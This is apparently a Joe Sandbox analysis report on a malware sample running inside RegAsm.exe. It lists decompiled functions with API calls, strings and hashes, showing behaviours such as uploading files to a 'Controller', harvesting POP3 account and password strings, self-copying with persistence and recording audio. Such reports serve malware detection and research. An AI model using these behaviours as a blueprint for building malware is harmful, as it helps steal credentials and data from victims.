                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                          • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                          • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                          • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                          • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                          • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                          • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                          • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                          • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                          • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                          • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                          • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Write$Create
                                                          • String ID: RIFF$WAVE$data$fmt
                                                          • API String ID: 1602526932-4212202414
                                                          • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                          • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                                          • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                                          • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                                          Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                                          • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                          • API String ID: 1646373207-255920310
                                                          • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                          • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                                          • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                                          • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                                          Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                            • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                            • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                          • _strlen.LIBCMT ref: 10001855
                                                          • _strlen.LIBCMT ref: 10001869
                                                          • _strlen.LIBCMT ref: 1000188B
                                                          • _strlen.LIBCMT ref: 100018AE
                                                          • _strlen.LIBCMT ref: 100018C8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen$File$CopyCreateDelete
                                                          • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                          • API String ID: 3296212668-3023110444
                                                          • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                          • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                          • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                          • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                          Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _wcslen.LIBCMT ref: 0040CE07
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                                          • _wcslen.LIBCMT ref: 0040CEE6
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                          • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CF84
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                          • _wcslen.LIBCMT ref: 0040CFC6
                                                          • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                          • ExitProcess.KERNEL32 ref: 0040D062
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                          • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                          • API String ID: 1579085052-2309681474
                                                          • Opcode ID: d7471eb5d94e540b25e5ad0db1c062a60a0b3aa35b410e6b0353d865c5f111e4
                                                          • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                          • Opcode Fuzzy Hash: d7471eb5d94e540b25e5ad0db1c062a60a0b3aa35b410e6b0353d865c5f111e4
                                                          • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                          Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 0041C036
                                                          • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                                          • lstrlenW.KERNEL32(?), ref: 0041C067
                                                          • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                                          • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                                          • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                                          • _wcslen.LIBCMT ref: 0041C13B
                                                          • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                                          • GetLastError.KERNEL32 ref: 0041C173
                                                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                                          • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                                          • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                                          • GetLastError.KERNEL32 ref: 0041C1D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                          • String ID: ?
                                                          • API String ID: 3941738427-1684325040
                                                          • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                          • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                                          • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                                          • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                                          Function 100019B2 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %m$~$Gon~$~F@7$~dra
                                                          • API String ID: 4218353326-230879103
                                                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                          Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable$_wcschr
                                                          • String ID:
                                                          • API String ID: 3899193279-0
                                                          • Opcode ID: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                          • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                                          • Opcode Fuzzy Hash: 12b2d8700cfafab1c51f31b0af1c60b5a90c67e430b3d12670f3d9796c815c4a
                                                          • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                                          Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                                          • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                                          • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                          • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                          • API String ID: 2490988753-744132762
                                                          • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                          • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                                          • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                                          • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                                          Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                                          • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumOpen
                                                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                          • API String ID: 1332880857-3714951968
                                                          • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                          • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                                          • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                                          • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                                          Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                                          • GetCursorPos.USER32(?), ref: 0041D5E9
                                                          • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                                          • ExitProcess.KERNEL32 ref: 0041D665
                                                          • CreatePopupMenu.USER32 ref: 0041D66B
                                                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                          • String ID: Close
                                                          • API String ID: 1657328048-3535843008
                                                          • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                          • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                                          • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                                          • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                                          Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$Info
                                                          • String ID:
                                                          • API String ID: 2509303402-0
                                                          • Opcode ID: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                          • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                                          • Opcode Fuzzy Hash: 9a1e8def710a50f9e802e5816f878b52a4fdf116ee4a506070fe770fe0ef34d2
                                                          • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                                          Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                                          • __aulldiv.LIBCMT ref: 00408D4D
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                                          • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                                          • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                          • API String ID: 3086580692-2582957567
                                                          • Opcode ID: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
                                                          • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                                          • Opcode Fuzzy Hash: 83544a841d733fb685d9403c845306c33a91344e28fc051850798e968e587a75
                                                          • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                                          Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                            • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                          • _free.LIBCMT ref: 004512FF
                                                            • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00451321
                                                          • _free.LIBCMT ref: 00451336
                                                          • _free.LIBCMT ref: 00451341
                                                          • _free.LIBCMT ref: 00451363
                                                          • _free.LIBCMT ref: 00451376
                                                          • _free.LIBCMT ref: 00451384
                                                          • _free.LIBCMT ref: 0045138F
                                                          • _free.LIBCMT ref: 004513C7
                                                          • _free.LIBCMT ref: 004513CE
                                                          • _free.LIBCMT ref: 004513EB
                                                          • _free.LIBCMT ref: 00451403
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
                                                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                          • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                          Function 10007CC2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                                                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                                                          • _free.LIBCMT ref: 10007CFB
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 10007D1D
                                                          • _free.LIBCMT ref: 10007D32
                                                          • _free.LIBCMT ref: 10007D3D
                                                          • _free.LIBCMT ref: 10007D5F
                                                          • _free.LIBCMT ref: 10007D72
                                                          • _free.LIBCMT ref: 10007D80
                                                          • _free.LIBCMT ref: 10007D8B
                                                          • _free.LIBCMT ref: 10007DC3
                                                          • _free.LIBCMT ref: 10007DCA
                                                          • _free.LIBCMT ref: 10007DE7
                                                          • _free.LIBCMT ref: 10007DFF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                          • String ID:
                                                          • API String ID: 161543041-0
